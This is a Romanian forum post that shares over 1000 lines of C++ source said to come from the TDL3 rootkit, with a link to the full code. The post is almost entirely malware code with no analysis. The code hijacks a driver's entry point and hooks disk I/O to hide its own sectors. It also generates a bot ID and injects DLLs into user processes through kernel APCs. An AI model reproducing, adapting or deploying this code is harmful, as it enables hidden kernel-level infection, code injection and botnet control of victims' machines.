Jump to content
Nytro

TDL3 1000+ SC lines

By Nytro, in Programare

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

TDL3 1000+ SC lines

Bucati din codul sursa de la cunoscutul TDL3:

#include "inc.h"

#pragma comment(linker,"/subsystem:native /entry:DriverEntry")

NT_BEGIN
EXTERN_C_START

DWORD GetDelta();
NTSTATUS Reinitialize(PDEVICE_OBJECT,BOOLEAN);
VOID GetEPNameOffset();

NTSTATUS TDLEntry(PDRIVER_OBJECT pdoDriver,PUNICODE_STRING pusRegistry)
{

    PTDL_START ptsStart;
    PIMAGE_NT_HEADERS pinhHeader;

    GET_TDL_ADDRESSES->pdoDeviceDisk=(PDEVICE_OBJECT)pusRegistry;
    pinhHeader=(PIMAGE_NT_HEADERS)RtlImageNtHeader(pdoDriver->DriverStart);
     ptsStart=(PTDL_START)RtlOffsetToPointer(pdoDriver->DriverStart,pinhHeader->OptionalHeader.AddressOfEntryPoint+TDL_START_SIZE-sizeof(TDL_START));
    GET_TDL_ADDRESSES->ullFSOffset=ptsStart->ullDriverCodeOffset;
    pinhHeader->OptionalHeader.AddressOfEntryPoint=(DWORD)(DWORD_PTR)ptsStart->pdiOEP;
    pinhHeader->OptionalHeader.CheckSum=ptsStart->dwCheckSum;
    pinhHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].Size=ptsStart->dwSectionSecuritySize;
     pinhHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_SECURITY].VirtualAddress=ptsStart->dwSectionSecurityVirtualAddress;
    GetEPNameOffset();
    *GET_TDL_ADDRESSES->cBotID=0;
    if(!NT_SUCCESS(Reinitialize(0,FALSE)))
    {
        IoRegisterFsRegistrationChange(GET_TDL_ADDRESSES->pdoDriver,ADDRESS_DELTA(PDRIVER_FS_NOTIFICATION,Reinitialize));
    }
    return STATUS_SUCCESS;
}

VOID GetEPNameOffset()
{
    CHAR cSystem[]={'S','y','s','t','e','m',0};

    GET_TDL_ADDRESSES->dwEPNameOffset=0;
    while(memcmp(RtlOffsetToPointer(IoGetCurrentProcess(),GET_TDL_ADDRESSES->dwEPNameOffset),cSystem,sizeof(cSystem))!=0)
    {
        GET_TDL_ADDRESSES->dwEPNameOffset++;
    }
    return;
}

PVOID Unxor(PVOID pvData,DWORD dwSize,BYTE bKey)
{
    DWORD dwData;

    for(dwData=0;dwData<dwSize;dwData++)
    {
        ((PBYTE)pvData)[dwData]^=dwData+bKey;
    }
    return pvData;
};

NTSTATUS SCSICmd(PDEVICE_OBJECT pdoDevice,PDRIVER_DISPATCH  pddDispatch,BYTE bOpCode,BYTE bDataIn,PVOID pvBuffer,DWORD  dwBufferSize,DWORD dwAddress)
{
    SCSI_REQUEST_BLOCK srbBuffer;
    SENSE_DATA sdData;
    IO_STATUS_BLOCK iosbStatus;
    KEVENT keEvent;
    PIRP piIrp;
    PMDL pmMdl;
    PIO_STACK_LOCATION pislStack;

    memset(&srbBuffer,0,sizeof(srbBuffer));
    memset(&sdData,0,sizeof(sdData));
    srbBuffer.Length=sizeof(srbBuffer);
    srbBuffer.Function=SRB_FUNCTION_EXECUTE_SCSI;
    srbBuffer.QueueAction=SRB_FLAGS_DISABLE_AUTOSENSE;
    srbBuffer.CdbLength=CDB10GENERIC_LENGTH;
    srbBuffer.SenseInfoBufferLength=sizeof(sdData);
    srbBuffer.SenseInfoBuffer=&sdData;
    srbBuffer.DataTransferLength=dwBufferSize;
    srbBuffer.DataBuffer=pvBuffer;
    srbBuffer.TimeOutValue=5000;
    srbBuffer.QueueSortKey=dwAddress;
    srbBuffer.SrbFlags=bDataIn|SRB_FLAGS_DISABLE_AUTOSENSE;
    srbBuffer.Cdb[0]=bOpCode;
    srbBuffer.Cdb[2]=(BYTE)((dwAddress&0xff000000)>>24); 
    srbBuffer.Cdb[3]=(BYTE)((dwAddress&0xff0000)>>16); 
    srbBuffer.Cdb[4]=(BYTE)((dwAddress&0xff00)>>8); 
    srbBuffer.Cdb[5]=(BYTE)(dwAddress&0xff);
    if(dwAddress!=0)
    {
        DWORD dwSectors;

        dwSectors=dwBufferSize/0x200;
        srbBuffer.Cdb[7]=(BYTE)((dwSectors&0xff00)>>8);
        srbBuffer.Cdb[8]=(BYTE)(dwSectors&0xff);
    }
    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);
    piIrp=IoAllocateIrp(pdoDevice->StackSize,FALSE);
    if(piIrp!=0)
    {
        pmMdl=IoAllocateMdl(pvBuffer,dwBufferSize,0,0,piIrp);
        srbBuffer.OriginalRequest=piIrp;
        piIrp->MdlAddress=pmMdl;
        MmProbeAndLockPages(pmMdl,KernelMode,IoModifyAccess);
        piIrp->UserIosb=&iosbStatus;
        piIrp->UserEvent=&keEvent;
        piIrp->Flags=IRP_SYNCHRONOUS_API|IRP_NOCACHE;
        piIrp->Tail.Overlay.Thread=KeGetCurrentThread();
        pislStack=IoGetNextIrpStackLocation(piIrp);
        pislStack->DeviceObject=pdoDevice;
        pislStack->MajorFunction=IRP_MJ_SCSI;
        pislStack->Parameters.Scsi.Srb=&srbBuffer;
        piIrp->CurrentLocation--;
        pislStack=IoGetNextIrpStackLocation(piIrp);
        piIrp->Tail.Overlay.CurrentStackLocation=pislStack;
        pislStack->DeviceObject=pdoDevice;
        if(pddDispatch(pdoDevice,piIrp)==STATUS_PENDING)
        {
            KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,0);
        }
        return iosbStatus.Status;
    }
    return STATUS_INSUFFICIENT_RESOURCES;
}

extern "C"
{
    #include "gz.cpp"
    #include "md4.cpp"
    #include "socket.cpp"
    #include "tdlini.cpp"
    #include "tdlfs.cpp"

}

NTSTATUS MJCompletion(PDEVICE_OBJECT pdoDevice,PIRP piIrp,PVOID pvContext)
{
    NTSTATUS ntsStatus;

    if(NT_SUCCESS(piIrp->IoStatus.Status))
    {
        PVOID pvBuffer;
        PIO_STACK_LOCATION pislStack;
        DWORD dwSector;

        pislStack=IoGetCurrentIrpStackLocation(piIrp);
        pvBuffer=MmGetSystemAddressForMdlSafe(piIrp->MdlAddress,NormalPagePriority);
         if(((PDISK_COMPLETION)pvContext)->dwSectorOffset+(DWORD)piIrp->IoStatus.Information/GET_TDL_ADDRESSES->dwSectorSize>GET_TDL_ADDRESSES->dwFirstHiddenSector)
        {
            DWORD dwOffset;

            if(((PDISK_COMPLETION)pvContext)->dwSectorOffset<GET_TDL_ADDRESSES->dwFirstHiddenSector)
            {
                 dwOffset=(GET_TDL_ADDRESSES->dwFirstHiddenSector-((PDISK_COMPLETION)pvContext)->dwSectorOffset)*GET_TDL_ADDRESSES->dwSectorSize;
            }
            else
            {
                dwOffset=0;
            }
            memset(RtlOffsetToPointer(pvBuffer,dwOffset),0,(DWORD)piIrp->IoStatus.Information-dwOffset);
        }
        else
        {
            for(dwSector=0;dwSector<GET_TDL_ADDRESSES->dwHiddenSectors;dwSector++)
            {
                if((GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset!=0)
                     &&ADDRESS_IN(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset,((PDISK_COMPLETION)pvContext)->dwSectorOffset,piIrp->IoStatus.Information/GET_TDL_ADDRESSES->dwSectorSize))
                {
                     memcpy(RtlOffsetToPointer(pvBuffer,GET_TDL_ADDRESSES->thsSectors[dwSector].dwOffset+(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset-((PDISK_COMPLETION)pvContext)->dwSectorOffset)*GET_TDL_ADDRESSES->dwSectorSize),GET_TDL_ADDRESSES->thsSectors[dwSector].pvValue,GET_TDL_ADDRESSES->thsSectors[dwSector].dwSize);
                }
            }
        }
    }
    if(((PDISK_COMPLETION)pvContext)->picrCompletion!=0)
    {
        ntsStatus=((PDISK_COMPLETION)pvContext)->picrCompletion(pdoDevice,piIrp,((PDISK_COMPLETION)pvContext)->pvContext);
    }
    ExFreePool(pvContext);
    return ntsStatus;
}

NTSTATUS MJDispatch(PDEVICE_OBJECT pdoDevice,PIRP piIrp)
{
    PIO_STACK_LOCATION pislStack;
    PDISK_COMPLETION pdcCompletion=0;
    DWORD dwSector;

    pislStack=IoGetCurrentIrpStackLocation(piIrp);
    if((pdoDevice==GET_TDL_ADDRESSES->pdoFSDevice)
        &&(pislStack->FileObject!=0)
         &&(pislStack->FileObject->FileName.Length>sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)+2*sizeof(L'\\')-sizeof(WCHAR))
         &&(memcmp(RtlOffsetToPointer(pislStack->FileObject->FileName.Buffer,sizeof(L'\\')),GET_TDL_ADDRESSES->wcTDLDirectory,sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))==0))
    {
        piIrp->IoStatus.Status=STATUS_NOT_IMPLEMENTED;
        piIrp->IoStatus.Information=0;
        TDLFSDispatch(pdoDevice,piIrp);
        IoCompleteRequest(piIrp,IO_NO_INCREMENT);
        return piIrp->IoStatus.Status;
    }
    if((pdoDevice==GET_TDL_ADDRESSES->pdoDeviceDisk)
        &&(!((pislStack->FileObject!=0)
             &&(pislStack->FileObject->FileName.Length==sizeof(L'\\')+sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))
             &&(memcmp(RtlOffsetToPointer(pislStack->FileObject->FileName.Buffer,sizeof(L'\\')),GET_TDL_ADDRESSES->wcTDLDirectory,sizeof(GET_TDL_ADDRESSES->wcTDLDirectory)-sizeof(WCHAR))==0)))
        &&(pislStack->MajorFunction==IRP_MJ_SCSI)
        &&(pislStack->Parameters.Scsi.Srb->Function==SRB_FUNCTION_EXECUTE_SCSI))
    {
        BOOL bComplete=FALSE;
        BOOL bEnd=FALSE;

         if(pislStack->Parameters.Scsi.Srb->QueueSortKey+pislStack->Parameters.Scsi.Srb->DataTransferLength/GET_TDL_ADDRESSES->dwSectorSize>GET_TDL_ADDRESSES->dwFirstHiddenSector)
        {
            bEnd=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_OUT)!=0;
            bComplete=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_IN)!=0;
        }
        else
        {
            for(dwSector=0;dwSector<GET_TDL_ADDRESSES->dwHiddenSectors;dwSector++)
            {
                if((GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset!=0)
                     &&ADDRESS_IN(GET_TDL_ADDRESSES->thsSectors[dwSector].dwSectorOffset,pislStack->Parameters.Scsi.Srb->QueueSortKey,pislStack->Parameters.Scsi.Srb->DataTransferLength/GET_TDL_ADDRESSES->dwSectorSize))
                {
                    bEnd=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_OUT)!=0;
                    bComplete=(pislStack->Parameters.Scsi.Srb->SrbFlags&SRB_FLAGS_DATA_IN)!=0;
                }
            }
        }
        if(bEnd)
        {
            pislStack->Parameters.Scsi.Srb->SrbStatus=SRB_STATUS_SUCCESS;
            pislStack->Parameters.Scsi.Srb->InternalStatus=SRB_STATUS_SUCCESS;
            piIrp->IoStatus.Status=STATUS_SUCCESS;
            IoCompleteRequest(piIrp,IO_NO_INCREMENT);
            return STATUS_SUCCESS;
        }
        if(bComplete)
        {
            pdcCompletion=(PDISK_COMPLETION)ExAllocatePool(NonPagedPool,sizeof(DISK_COMPLETION));
            if(pdcCompletion!=0)
            {
                pdcCompletion->picrCompletion=pislStack->CompletionRoutine;
                pdcCompletion->pvContext=pislStack->Context;
                pdcCompletion->dwSectorOffset=pislStack->Parameters.Scsi.Srb->QueueSortKey;
                pislStack->Control=SL_INVOKE_ON_SUCCESS|SL_INVOKE_ON_ERROR|SL_INVOKE_ON_CANCEL;
                pislStack->Context=pdcCompletion;
                pislStack->CompletionRoutine=ADDRESS_DELTA(PIO_COMPLETION_ROUTINE,MJCompletion);
            }
        }
    }
    return GET_TDL_ADDRESSES->pddDiskMJ[pislStack->MajorFunction](pdoDevice,piIrp);
}

NTSTATUS GenerateBotID(PCHAR pcBotID,DWORD dwBotIDSize)
{
    CHAR cBotIDFormat[]={'%','x','%','x',0};
    WCHAR wcVolumeObject[]={L'\\',L's',L'y',L's',L't',L'e',L'm',L'r',L'o',L'o',L't',0};
    UUID uuidBotID;
    UNICODE_STRING usName;
    HANDLE hVolume;
    FILE_FS_VOLUME_INFORMATION ffviInfo;
    IO_STATUS_BLOCK iosbStatus;
    OBJECT_ATTRIBUTES oaAttributes;

    RtlInitUnicodeString(&usName,wcVolumeObject);
    InitializeObjectAttributes(&oaAttributes,&usName,OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE,0,0);
    ffviInfo.VolumeSerialNumber=0;
     if(NT_SUCCESS(ZwOpenFile(&hVolume,SYNCHRONIZE,&oaAttributes,&iosbStatus,FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE,FILE_SYNCHRONOUS_IO_NONALERT)))
    {
        ZwQueryVolumeInformationFile(hVolume,&iosbStatus,&ffviInfo,sizeof(ffviInfo),FileFsVolumeInformation);
        ZwClose(hVolume);
    }
    if(ExUuidCreate(&uuidBotID)==0)
    {
        _snprintf(pcBotID,dwBotIDSize,cBotIDFormat,*(PDWORD)RtlOffsetToPointer(uuidBotID.Data4,4),ffviInfo.VolumeSerialNumber);
        return STATUS_SUCCESS;
    }    
    return STATUS_RETRY;
}

__declspec(naked) DWORD GetDelta()
{
    __asm
    {
        call delta
        delta:
        pop    eax
        sub    eax,offset delta
        retn
    }
}

__declspec(noinline) PVOID GetNtoskrnlBase()
{
    BYTE bIDT[6];
    PIDT_ENTRY pieIDTEntry;
    PWORD pwAddress;

    __asm
    {
        sidt bIDT;
    }
    pieIDTEntry=(PIDT_ENTRY)(*((PDWORD_PTR)&bIDT[2])+8*0x40);
    pwAddress=PWORD(pieIDTEntry->dw64OffsetLow|(pieIDTEntry->dw64OffsetHigh<<16));
    do
    {
        pwAddress=(PWORD)ALIGNDOWN(pwAddress,PAGE_SIZE);
        if(*pwAddress=='ZM')
        {
            return (PVOID)pwAddress;
        }
        pwAddress--;
    }
    while(pwAddress!=0);
    return 0;
}

VOID __stdcall APCKernelRoutine(PKAPC pkaApc,PKNORMAL_ROUTINE*,PVOID*,PVOID* ppvMemory,PVOID*)
{
    ExFreePool(pkaApc);
    return;
}

NTSTATUS DllInject(HANDLE hProcessID,PEPROCESS pepProcess,PKTHREAD pktThread,PCHAR pcDll,BOOLEAN bAlert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oaAttributes={sizeof(OBJECT_ATTRIBUTES)};
    CLIENT_ID cidProcess;
    PVOID pvMemory=0;
    DWORD dwSize;
    CHAR cDllReal[MAX_PATH];
    CHAR cDllRealFormat[]={'\\','\\','?','\\','g','l','o','b','a','l','r','o','o','t','%','S','\\','%','S','\\','%','s',0};
    PCHAR pcDllReal;

    if(*pcDll!='\\')
    {
         dwSize=_snprintf(cDllReal,RTL_NUMBER_OF(cDllReal)-1,cDllRealFormat,GET_TDL_ADDRESSES->wcFSDevice,GET_TDL_ADDRESSES->wcTDLDirectory,pcDll)+1;
        pcDllReal=cDllReal;
    }
    else
    {
        pcDllReal=pcDll;
        dwSize=strlen(pcDll)+1;
    }
    cidProcess.UniqueProcess=hProcessID;
    cidProcess.UniqueThread=0;
    if(NT_SUCCESS(ZwOpenProcess(&hProcess,PROCESS_ALL_ACCESS,&oaAttributes,&cidProcess)))
    {
        if(NT_SUCCESS(ZwAllocateVirtualMemory(hProcess,&pvMemory,0,&dwSize,MEM_RESERVE|MEM_COMMIT,PAGE_READWRITE)))
        {
            KAPC_STATE kasState;
            PKAPC pkaApc;

            KeStackAttachProcess(pepProcess,&kasState);
            strcpy(pvMemory,pcDllReal);
            KeUnstackDetachProcess(&kasState);
            pkaApc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC));
            if(pkaApc!=0)
            {
                 KeInitializeApc(pkaApc,pktThread,0,ADDRESS_DELTA(PKKERNEL_ROUTINE,APCKernelRoutine),0,GET_TDL_ADDRESSES->pvLoadLibraryExA,UserMode,pvMemory);
                KeInsertQueueApc(pkaApc,0,0,IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        ZwClose(hProcess);
    }
    return STATUS_NO_MEMORY;
}

VOID WIInjector(PVOID pvContext)
{
    CHAR cAny[]=TDL_CONFIG_INJECTOR_ANY;
    CHAR cSection[]=TDL_CONFIG_INJECTOR;
    CHAR cDll[MAX_PATH];


    CHAR cSection2[]=TDL_CONFIG_MAIN;
    CHAR cKey[]={'d','a','t','e',0};


    DWORD dwDate=TDLIniReadDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,0);
    DWORD dwCurrent;

    LARGE_INTEGER liTime;
    KeQuerySystemTime(&liTime);
    RtlTimeToSecondsSince1970(&liTime,&dwCurrent);

    //CHAR cDebug[]={'D','A','T','E','%','d',' ','%','d',' ','%','d',' ','%','d','\n',0};
    //DbgPrint(cDebug,dwDate,dwCurrent,dwCurrent-dwDate,0);


    //if(dwCurrent-dwDate>=60*24*60)
    {
//        DbgPrint(cDebug,dwDate,dwCurrent,dwCurrent-dwDate,1);
        if(TDLIniReadString(GET_TDL_ADDRESSES->wcTDLConfig,cSection,cAny,0,cDll,sizeof(cDll)))
        {
             DllInject(((PWI_INJECT)pvContext)->hProcessID,((PWI_INJECT)pvContext)->pepProcess,((PWI_INJECT)pvContext)->pktThread,cDll,FALSE);
        }
         if(TDLIniReadString(GET_TDL_ADDRESSES->wcTDLConfig,cSection,RtlOffsetToPointer(((PWI_INJECT)pvContext)->pepProcess,GET_TDL_ADDRESSES->dwEPNameOffset),0,cDll,sizeof(cDll)))
        {
             DllInject(((PWI_INJECT)pvContext)->hProcessID,((PWI_INJECT)pvContext)->pepProcess,((PWI_INJECT)pvContext)->pktThread,cDll,FALSE);
        }
    }

    KeSetEvent(&((PWI_INJECT)pvContext)->keEvent,(KPRIORITY)0,FALSE);
    return;
}

VOID __stdcall APCInjectRoutine(PKAPC pkaApc,PKNORMAL_ROUTINE*,PVOID*,PVOID*,PVOID*)
{
    WI_INJECT wiiItem;

    ExFreePool(pkaApc);
    wiiItem.pktThread=KeGetCurrentThread();
    wiiItem.pepProcess=IoGetCurrentProcess();
    wiiItem.hProcessID=PsGetCurrentProcessId();
    KeInitializeEvent(&wiiItem.keEvent,NotificationEvent,FALSE);
    ExInitializeWorkItem(&wiiItem.qiItem,ADDRESS_DELTA(PWORKER_THREAD_ROUTINE,WIInjector),&wiiItem);
    ExQueueWorkItem(&wiiItem.qiItem,DelayedWorkQueue);
    KeWaitForSingleObject(&wiiItem.keEvent,Executive,KernelMode,TRUE,0);
    return;
}

VOID LoadImageNotify(PUNICODE_STRING FullImageName,HANDLE hProcessID,PIMAGE_INFO ImageInfo)
{
    if(FullImageName!=0)
    {
        WCHAR wcKernel32Mask[]={L'*',L'\\',L'K',L'E',L'R',L'N',L'E',L'L',L'3',L'2',L'.',L'D',L'L',L'L',0};
        UNICODE_STRING usKernel32Mask;

        RtlInitUnicodeString(&usKernel32Mask,wcKernel32Mask);
        if(FsRtlIsNameInExpression(&usKernel32Mask,FullImageName,TRUE,0))
        {
            PKAPC pkaApc;

            if(GET_TDL_ADDRESSES->pvLoadLibraryExA==0)
            {
                 GET_TDL_ADDRESSES->pvLoadLibraryExA=GetProcedureAddressByHash(ImageInfo->ImageBase,TDL_HASH_LOADLIBRARYEXA);
            }
            pkaApc=(PKAPC)ExAllocatePool(NonPagedPool,sizeof(KAPC));
            if(pkaApc!=0)
            {
                 KeInitializeApc(pkaApc,KeGetCurrentThread(),0,ADDRESS_DELTA(PKKERNEL_ROUTINE,APCInjectRoutine),0,0,KernelMode,0);
                KeInsertQueueApc(pkaApc,0,0,IO_NO_INCREMENT);
            }
        }
    }
    return;
}

VOID WIKnock(PVOID pvWIKnock)
{
    KEVENT keEvent;

    ExFreePool(pvWIKnock);

    /*
    CHAR cSection2[]=TDL_CONFIG_MAIN;
        CHAR cKey[]={'r','e','b','o','o','t','s',0};
        CHAR cDebug[]={'U','P','D','%','s',' ','%','d','\n',0};
        DWORD dwRand=(DWORD)rand()%100;
        DbgPrint(cDebug,cKey,dwRand);
        TDLIniWriteDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,dwRand);
    */

    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);
    while(TRUE)
    {

        LARGE_INTEGER liDelay;


        if((*GET_TDL_ADDRESSES->cBotID==0)
            &&NT_SUCCESS(GenerateBotID(GET_TDL_ADDRESSES->cBotID,RTL_NUMBER_OF(GET_TDL_ADDRESSES->cBotID))))
        {
            OBJECT_ATTRIBUTES oaAttributes;
            WCHAR wcBotID[0x10+sizeof(L'\\')+1];
            WCHAR wcBotIDFormat[]={L'\\',L'%',L'S',0};
            UNICODE_STRING usName;
            HANDLE hEvent;

            _snwprintf(wcBotID,RTL_NUMBER_OF(wcBotID),wcBotIDFormat,GET_TDL_ADDRESSES->cBotID);
            RtlInitUnicodeString(&usName,wcBotID);
            InitializeObjectAttributes(&oaAttributes,&usName,OBJ_CASE_INSENSITIVE|OBJ_KERNEL_HANDLE,0,0);
            ZwCreateEvent(&hEvent,EVENT_ALL_ACCESS,&oaAttributes,NotificationEvent,TRUE);
            return;
        }
        liDelay.QuadPart=(LONGLONG)-10*10000000;

        //liDelay.QuadPart=(LONGLONG)-1*10000000;
        KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,&liDelay);
    }
    return;
}
/*

void WITimer(PVOID pvWITimer)
{
    CHAR cSection2[]=TDL_CONFIG_MAIN;
    CHAR cKey[]={'r','e','b','o','o','t','s',0};
    CHAR cDebug[]={'U','P','D','%','s',' ','%','d','\n',0};
    KEVENT keEvent;

    ExFreePool(pvWITimer);
    KeInitializeEvent(&keEvent,NotificationEvent,FALSE);

    while(TRUE)
    {
        DWORD dwRand=(DWORD)rand()%100;
        LARGE_INTEGER liDelay;

        DbgPrint(cDebug,cKey,dwRand);
        //TDLIniWriteDword(GET_TDL_ADDRESSES->wcTDLConfig,cSection2,cKey,dwRand);

        liDelay.QuadPart=(LONGLONG)-5*10000000;
        KeWaitForSingleObject(&keEvent,Executive,KernelMode,FALSE,&liDelay);
    }

}
*/

PIMAGE_SECTION_HEADER RvaToSectionHeader(PIMAGE_NT_HEADERS pinhHeader,DWORD dwRva)
{
    PIMAGE_SECTION_HEADER pishHeader;
    DWORD dwSection;

    pishHeader=IMAGE_FIRST_SECTION(pinhHeader);
    for(dwSection=0;dwSection<pinhHeader->FileHeader.NumberOfSections;dwSection++)
    {
        if((dwRva>=pishHeader->VirtualAddress)
            &&(dwRva<(pishHeader->VirtualAddress+pishHeader->Misc.VirtualSize)))
        {
            return pishHeader;
        }
        pishHeader++;
    }
    return 0;
}

DWORD RvaToFileOffset(PIMAGE_NT_HEADERS pinhHeader,DWORD dwRva)
{
    PIMAGE_SECTION_HEADER pishHeader;

    pishHeader=RvaToSectionHeader(pinhHeader,dwRva);
    if(pishHeader!=0)
    {
        return  (DWORD)ALIGNDOWN(pishHeader->PointerToRawData,pinhHeader->OptionalHeader.FileAlignment)+(dwRva-pishHeader->VirtualAddress);
    }
    return 0;
}

Complet:

http://pastebin.com/UpvGUw19

Sursa: Some TDL3 C++ Source code 1000+ lines

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...